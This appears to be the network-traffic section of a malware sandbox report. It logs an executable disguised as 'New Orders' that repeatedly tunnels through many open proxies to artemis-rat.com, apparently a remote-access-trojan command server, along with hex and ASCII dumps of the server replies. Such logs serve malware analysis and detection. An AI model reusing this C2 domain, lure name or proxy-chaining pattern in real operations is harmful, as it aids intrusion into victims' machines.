                                                                                        Mar 11, 2024 16:17:04.476327896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:19.476238966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        456192.168.2.950641190.2.110.741537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.703639030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        457192.168.2.951324185.217.143.23807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.759821892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        458192.168.2.951307120.78.191.68807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.760623932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.103559971 CET767INHTTP/1.1 403 Forbidden
                                                                                        Server: Beaver
                                                                                        Cache-Control: no-cache
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 635
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                        Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                                                                                        Mar 11, 2024 16:16:42.103660107 CET318INHTTP/1.1 400 Bad Request
                                                                                        Server: openresty
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Content-Length: 154
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        459192.168.2.95133751.75.206.209807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.760624886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.095078945 CET536INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:42 GMT
                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                        Content-Length: 614
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 77 65 62 6d 61 73 74 65 72 40 6c 6f 63 61 6c 68 6f 73 74 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at webmaster@localhost to inform them of
                                                                                        Mar 11, 2024 16:16:43.095110893 CET270INData Raw: 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72
                                                                                        Data Ascii: the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.38 (Debian) Server at artemis-rat.com Port 44


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        460192.168.2.95135823.95.209.142156737672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.762120962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        461192.168.2.951329103.118.44.13680807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.763199091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        462192.168.2.95121069.61.200.104361817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.763451099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        463192.168.2.950673187.122.105.18141537672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.768197060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        464192.168.2.95127958.20.248.13990027672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.788834095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.206562042 CET311INHTTP/1.1 400 Bad Request
                                                                                        Server: nginx
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 166
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        465192.168.2.951356174.64.199.8241457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.808087111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        466192.168.2.951388104.16.105.146807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.812144041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.966456890 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        467192.168.2.951397104.16.105.207807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.812397957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.966717958 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        468192.168.2.951394104.18.237.128807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.812400103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.966725111 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        469192.168.2.95155143.134.238.254437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.815341949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        470192.168.2.951419172.67.182.165807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.816198111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:41.970323086 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:41 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        471192.168.2.95155643.134.238.254437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.818053961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        472192.168.2.95156143.134.238.254437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.821330070 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        473192.168.2.95156643.134.238.254437672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.826142073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        474192.168.2.951293202.144.134.15056787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.865947008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        475192.168.2.95136772.195.34.4141457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.867471933 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        476192.168.2.951127112.30.155.83127927672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.867479086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.069977999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.674556017 CET39INHTTP/1.1 200 Connection established


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        477192.168.2.95134081.91.157.13456787672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.868256092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        478192.168.2.950711138.36.150.1610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:41.868261099 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.733464956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:43.824385881 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


